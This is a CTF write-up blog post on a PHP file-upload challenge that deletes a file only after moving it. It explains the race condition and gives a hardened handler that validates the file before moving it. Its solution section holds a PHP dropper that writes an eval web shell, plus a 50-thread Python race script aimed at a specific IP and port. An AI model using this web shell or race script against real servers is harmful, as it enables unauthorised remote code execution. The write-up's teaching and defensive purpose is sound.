wzsc_文件上传 (File Upload)

Source:

<?php
    $allowtype = array("txt","jpeg","bmv","doc","docx","gif","png","jpg");
    $size = 10000000;
    $path = "./upload/";
 
    $filename = $_FILES['file']['name'];
 
    // The upload is moved into the web-accessible directory under its
    // original, client-supplied name BEFORE the extension is checked.
    if (is_uploaded_file($_FILES['file']['tmp_name'])){
        if (!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
            exit();
        }   
    } else {
        exit();
    }
 
    $newfile = $path.$filename;
 
    if ($_FILES['file']['error'] > 0){
        unlink($newfile);
        exit();
    }
 
    // Whitelist check on the last "."-separated segment of the name; a file
    // that fails it is deleted only now, after it was already reachable on disk.
    $ext = array_pop(explode(".",$_FILES['file']['name']));
    if (!in_array($ext,$allowtype)){
        unlink($newfile);
        exit();
    }
?>

Approach:

The file extension is restricted by a whitelist, but the handler moves the upload into ./upload/ under its original name before it checks the extension and only then unlinks a rejected file, so there is a window in which a .php file exists on disk. We can exploit that window with a race condition.

In a typical upload, the client sends the file data to the server in chunks and the server assembles them into a complete file. Under a race condition, the following can happen:

  1. The client issues several upload requests at once: multiple concurrent requests reach the server, which may not process them in a well-defined order.
  2. Several requests write the same file at once: if multiple requests write the same file concurrently, the data may be overwritten or overlap, and the final content may be incomplete or incorrect.
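The fix for this class of bug is ordering, not a stricter whitelist: validate the upload while it is still in PHP's temporary directory, and only move it once every check has passed, so that no unchecked content is ever reachable under the web root. The following hardened handler is an added example written for this writeup; it is not the challenge's own code. It keeps the "file" form field and the "./upload/" directory from the challenge, assumes that directory is served as static files with PHP execution disabled, and uses "bmp" where the original list has "bmv".

```php
<?php
// Added example (not the challenge's code): validate BEFORE move, so the
// time-of-check/time-of-use window the challenge relies on never exists.

$allowtype = array("txt", "jpeg", "bmp", "doc", "docx", "gif", "png", "jpg");
// Content types accepted for those extensions, as reported by libmagic.
// Note: libmagic may report .docx as application/zip on some builds.
$allowmime = array(
    "text/plain", "image/jpeg", "image/bmp", "image/gif", "image/png",
    "application/msword",
    "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
);
$size = 10000000;
$path = "./upload/";   // assumed: static-only directory, no PHP execution

function reject($reason) {
    http_response_code(400);
    exit($reason);
}

// 1. Sanity checks on the upload record itself. Check the error code first;
//    the original handler consulted it only after the move.
if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
    reject("upload error");
}
$tmp = $_FILES['file']['tmp_name'];
if (!is_uploaded_file($tmp)) {
    reject("not an uploaded file");
}
if ($_FILES['file']['size'] > $size || filesize($tmp) > $size) {
    reject("file too large");
}

// 2. Whitelist the extension while the file is still in the temp dir.
//    pathinfo() returns the LAST extension: "a.php.jpg" -> "jpg",
//    "a.jpg.php" -> "php". Compare case-insensitively and strictly.
$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowtype, true)) {
    reject("extension not allowed");
}

// 3. Check the detected MIME type of the content, not the client's claim
//    in $_FILES['file']['type'].
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime = $finfo->file($tmp);
if (!in_array($mime, $allowmime, true)) {
    reject("content type not allowed");
}

// 4. Never reuse the client-supplied name: a random name removes path
//    prediction (the exploit needs to know it is /upload/a.php) and
//    collisions between concurrent uploads.
$newname = bin2hex(random_bytes(16)) . "." . $ext;
$dest = $path . $newname;

// 5. Only now move the file. Nothing unchecked ever existed under $path,
//    so there is no window for a concurrent GET to hit.
if (!move_uploaded_file($tmp, $dest)) {
    reject("could not store file");
}
echo "stored as " . htmlspecialchars($newname);
?>
```

Two of the steps matter even without the race: the random filename removes the predictable path the concurrent requests depend on, and serving the upload directory with PHP execution disabled (for example via a web-server rule for that location) means that even a file that somehow lands there is returned as bytes rather than run.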

Solution:

Upload a.php with the following content:

<?php fputs(fopen("shell.php", "w"), '<?php @eval($_POST["shell"]); ?>'); ?>

Capture the upload request with Burp, send it to Intruder, and replay the POST many times:


While the POST requests are being replayed, run the following script alongside them to win the race:

import requests
import threading
import os


class RaceCondition(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)

        # a.php: the uploaded file, reachable briefly before the handler unlinks it
        self.url = 'http://61.147.171.105:58861/upload/a.php'
        # shell.php: the file a.php writes when it gets executed
        self.uploadUrl = 'http://61.147.171.105:58861/upload/shell.php'

    def _get(self):
        # Request a.php; a 200 means it was served (and therefore executed)
        print('try to call uploaded file...')
        r = requests.get(self.url)
        if r.status_code == 200:
            print('[*] create file shell.php success.')
            os._exit(0)

    def _upload(self):
        # Check whether shell.php has been created yet
        print('upload file...')
        rs = requests.get(self.uploadUrl)
        if rs.status_code == 200:
            print('[*] create file shell.php success.')
            os._exit(0)

    def run(self):
        while True:
            for i in range(5):
                self._get()

            for i in range(10):
                self._upload()
                self._get()


if __name__ == '__main__':
    threads = 50
    workers = []

    for i in range(threads):
        t = RaceCondition()
        t.start()
        workers.append(t)

    # Keep every thread handle and wait for each one
    for t in workers:
        t.join()


Connect to /upload/shell.php with AntSword to obtain the flag.

Posted 2023-07-30 15:32 by Magic水瓶 | 412 views | 0 comments